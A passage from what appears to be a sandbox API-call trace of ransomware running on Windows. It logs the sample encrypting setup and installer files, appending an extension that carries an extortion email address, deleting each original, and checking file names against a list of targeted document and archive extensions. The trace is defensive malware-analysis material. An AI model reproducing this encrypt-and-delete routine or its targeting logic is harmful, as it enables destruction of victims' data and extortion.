0x772d0000 [0164.823] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0164.823] Wow64DisableWow64FsRedirection (in: OldValue=0x2c2ff50 | out: OldValue=0x2c2ff50*=0x0) returned 1 [0164.823] lstrlenW (lpString="kernel32.dll") returned 12 [0164.823] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e8e0 | out: hHeap=0x710000) returned 1 [0164.823] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0164.823] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e9a8 | out: hHeap=0x710000) returned 1 [0164.823] Sleep (dwMilliseconds=0x64) [0166.883] lstrcmpiW (lpString1=".log", lpString2=".MSPLT") returned -1 [0166.884] lstrlenW (lpString="oobe_2017_09_07_03_08_57_737.log") returned 32 [0166.884] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0167.171] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=6004) returned 1 [0167.171] CloseHandle (hObject=0x2c8) returned 1 [0167.171] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log")) returned 0x20 [0167.171] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0167.172] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0167.172] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.172] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.172] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0167.172] GetLastError () returned 0x0 [0167.172] ReadFile (in: hFile=0x2c8, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x1774, lpOverlapped=0x0) returned 1 [0167.190] WriteFile (in: hFile=0x2cc, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x1780, lpOverlapped=0x0) returned 1 [0167.192] ReadFile (in: hFile=0x2c8, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0167.192] WriteFile (in: hFile=0x2cc, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x114, lpOverlapped=0x0) returned 1 [0167.192] SetEndOfFile (hFile=0x2cc) returned 1 [0167.192] CloseHandle (hObject=0x2cc) returned 1 [0167.193] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.193] SetEndOfFile (hFile=0x2c8) returned 1 [0167.194] CloseHandle (hObject=0x2c8) returned 1 [0167.195] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0167.195] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log")) returned 1 [0167.195] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.195] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.195] lstrlenW (lpString=".doc") returned 4 [0167.195] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0167.195] lstrlenW (lpString=".docx") returned 5 [0167.195] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0167.196] lstrlenW (lpString=".pdf") returned 4 [0167.196] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0167.196] lstrlenW (lpString=".xls") returned 4 [0167.196] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0167.196] lstrlenW (lpString=".xlsx") returned 5 [0167.196] lstrcmpiW (lpString1=".xlsx", lpString2="7.log") returned -1 [0167.196] lstrlenW (lpString=".ppt") returned 4 [0167.196] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0167.196] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.196] lstrlenW (lpString=".zip") returned 4 [0167.196] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0167.196] lstrlenW (lpString=".rar") returned 4 [0167.196] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0167.196] lstrlenW (lpString=".bz2") returned 4 [0167.196] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0167.196] lstrlenW (lpString=".7z") returned 3 [0167.196] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0167.196] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.196] lstrlenW (lpString=".dbf") returned 4 [0167.196] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0167.196] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.196] lstrlenW (lpString=".1cd") returned 4 [0167.196] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0167.196] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.196] lstrlenW (lpString=".jpg") returned 4 [0167.196] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0167.197] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.197] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.197] lstrlenW (lpString=".doc") returned 4 [0167.197] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0167.197] lstrlenW (lpString=".docx") returned 5 [0167.197] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0167.197] lstrlenW (lpString=".pdf") returned 4 [0167.197] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0167.197] lstrlenW (lpString=".xls") returned 4 [0167.197] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0167.197] lstrlenW (lpString=".xlsx") returned 5 [0167.197] lstrcmpiW (lpString1=".xlsx", lpString2="7.log") returned -1 [0167.197] lstrlenW (lpString=".ppt") returned 4 [0167.197] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0167.197] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.197] lstrlenW (lpString=".zip") returned 4 [0167.197] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0167.197] lstrlenW (lpString=".rar") returned 4 [0167.197] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0167.197] lstrlenW (lpString=".bz2") returned 4 [0167.197] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0167.197] lstrlenW (lpString=".7z") returned 3 [0167.197] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0167.197] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.198] lstrlenW (lpString=".dbf") returned 4 [0167.198] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0167.198] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.198] lstrlenW (lpString=".1cd") returned 4 [0167.198] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0167.198] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0167.198] lstrlenW (lpString=".jpg") returned 4 [0167.198] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0167.198] lstrcmpiW (lpString1=".ini", lpString2=".MSPLT") returned -1 [0167.198] lstrlenW (lpString="GetCurrentRollback.ini") returned 22 [0167.198] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0167.241] GetFileSizeEx (in: hFile=0x2d0, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=156) returned 1 [0167.241] CloseHandle (hObject=0x2d0) returned 1 [0167.241] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini")) returned 0x20 [0167.241] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0167.241] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0167.241] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.241] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.242] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0167.242] GetLastError () returned 0x0 [0167.242] ReadFile (in: hFile=0x2d0, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x9c, lpOverlapped=0x0) returned 1 [0167.243] WriteFile (in: hFile=0x2c8, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xa0, lpOverlapped=0x0) returned 1 [0167.244] ReadFile (in: hFile=0x2d0, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0167.245] WriteFile (in: hFile=0x2c8, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x100, lpOverlapped=0x0) returned 1 [0167.245] SetEndOfFile (hFile=0x2c8) returned 1 [0167.245] CloseHandle (hObject=0x2c8) returned 1 [0167.246] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.246] SetEndOfFile (hFile=0x2d0) returned 1 [0167.247] CloseHandle (hObject=0x2d0) returned 1 [0167.247] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0167.248] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini")) returned 1 [0167.248] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.248] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.248] lstrlenW (lpString=".doc") returned 4 [0167.248] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0167.248] lstrlenW (lpString=".docx") returned 5 [0167.248] lstrcmpiW (lpString1=".docx", lpString2="k.ini") returned -1 [0167.248] lstrlenW (lpString=".pdf") returned 4 [0167.248] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0167.248] lstrlenW (lpString=".xls") returned 4 [0167.248] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0167.248] lstrlenW (lpString=".xlsx") returned 5 [0167.248] lstrcmpiW (lpString1=".xlsx", lpString2="k.ini") returned -1 [0167.248] lstrlenW (lpString=".ppt") returned 4 [0167.248] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0167.248] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.249] lstrlenW (lpString=".zip") returned 4 [0167.249] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0167.249] lstrlenW (lpString=".rar") returned 4 [0167.249] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0167.249] lstrlenW (lpString=".bz2") returned 4 [0167.249] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0167.249] lstrlenW (lpString=".7z") returned 3 [0167.249] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0167.249] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.249] lstrlenW (lpString=".dbf") returned 4 [0167.249] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0167.249] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.249] lstrlenW (lpString=".1cd") returned 4 [0167.249] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0167.249] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.249] lstrlenW (lpString=".jpg") returned 4 [0167.249] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0167.249] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.249] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.249] lstrlenW (lpString=".doc") returned 4 [0167.249] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0167.249] lstrlenW (lpString=".docx") returned 5 [0167.249] lstrcmpiW (lpString1=".docx", lpString2="k.ini") returned -1 [0167.249] lstrlenW (lpString=".pdf") returned 4 [0167.249] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0167.249] lstrlenW (lpString=".xls") returned 4 [0167.250] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0167.250] lstrlenW (lpString=".xlsx") returned 5 [0167.250] lstrcmpiW (lpString1=".xlsx", lpString2="k.ini") returned -1 [0167.250] lstrlenW (lpString=".ppt") returned 4 [0167.250] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0167.250] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.250] lstrlenW (lpString=".zip") returned 4 [0167.250] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0167.250] lstrlenW (lpString=".rar") returned 4 [0167.250] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0167.250] lstrlenW (lpString=".bz2") returned 4 [0167.250] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0167.250] lstrlenW (lpString=".7z") returned 3 [0167.250] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0167.250] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.250] lstrlenW (lpString=".dbf") returned 4 [0167.250] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0167.250] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.250] lstrlenW (lpString=".1cd") returned 4 [0167.250] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0167.250] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned 44 [0167.250] lstrlenW (lpString=".jpg") returned 4 [0167.250] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0167.250] Sleep (dwMilliseconds=0x64) [0167.654] Sleep (dwMilliseconds=0x64) [0168.786] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0168.786] lstrlenW (lpString="LocalizedData.xml") returned 17 [0168.786] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.787] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=60816) returned 1 [0168.787] CloseHandle (hObject=0x304) returned 1 [0168.787] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml")) returned 0x80 [0168.787] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.787] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.787] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.787] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.788] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0168.788] GetLastError () returned 0x0 [0168.788] ReadFile (in: hFile=0x304, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0xed90, lpOverlapped=0x0) returned 1 [0168.793] WriteFile (in: hFile=0x308, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xeda0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xeda0, lpOverlapped=0x0) returned 1 [0168.796] ReadFile (in: hFile=0x304, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0168.796] WriteFile (in: hFile=0x308, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xf6, lpOverlapped=0x0) returned 1 [0168.796] SetEndOfFile (hFile=0x308) returned 1 [0168.797] CloseHandle (hObject=0x308) returned 1 [0168.800] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.800] SetEndOfFile (hFile=0x304) returned 1 [0168.802] CloseHandle (hObject=0x304) returned 1 [0168.802] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0168.802] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml")) returned 1 [0168.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.803] lstrlenW (lpString=".doc") returned 4 [0168.803] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0168.803] lstrlenW (lpString=".docx") returned 5 [0168.803] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0168.803] lstrlenW (lpString=".pdf") returned 4 [0168.803] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0168.803] lstrlenW (lpString=".xls") returned 4 [0168.803] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0168.803] lstrlenW (lpString=".xlsx") returned 5 [0168.803] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0168.803] lstrlenW (lpString=".ppt") returned 4 [0168.803] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0168.803] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.803] lstrlenW (lpString=".zip") returned 4 [0168.803] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0168.803] lstrlenW (lpString=".rar") returned 4 [0168.803] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0168.803] lstrlenW (lpString=".bz2") returned 4 [0168.804] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0168.804] lstrlenW (lpString=".7z") returned 3 [0168.804] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0168.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.804] lstrlenW (lpString=".dbf") returned 4 [0168.804] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0168.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.804] lstrlenW (lpString=".1cd") returned 4 [0168.804] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0168.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.804] lstrlenW (lpString=".jpg") returned 4 [0168.804] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0168.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.804] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.804] lstrlenW (lpString=".doc") returned 4 [0168.804] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0168.804] lstrlenW (lpString=".docx") returned 5 [0168.804] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0168.804] lstrlenW (lpString=".pdf") returned 4 [0168.804] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0168.804] lstrlenW (lpString=".xls") returned 4 [0168.804] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0168.804] lstrlenW (lpString=".xlsx") returned 5 [0168.804] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0168.805] lstrlenW (lpString=".ppt") returned 4 [0168.805] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0168.805] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.805] lstrlenW (lpString=".zip") returned 4 [0168.805] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0168.805] lstrlenW (lpString=".rar") returned 4 [0168.805] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0168.805] lstrlenW (lpString=".bz2") returned 4 [0168.805] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0168.805] lstrlenW (lpString=".7z") returned 3 [0168.805] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0168.805] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.805] lstrlenW (lpString=".dbf") returned 4 [0168.805] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0168.805] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.805] lstrlenW (lpString=".1cd") returned 4 [0168.805] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0168.805] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml") returned 44 [0168.805] lstrlenW (lpString=".jpg") returned 4 [0168.805] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0168.805] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0168.805] lstrlenW (lpString="eula.rtf") returned 8 [0168.806] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.807] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=3726) returned 1 [0168.807] CloseHandle (hObject=0x304) returned 1 [0168.807] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf")) returned 0x80 [0168.807] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.807] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 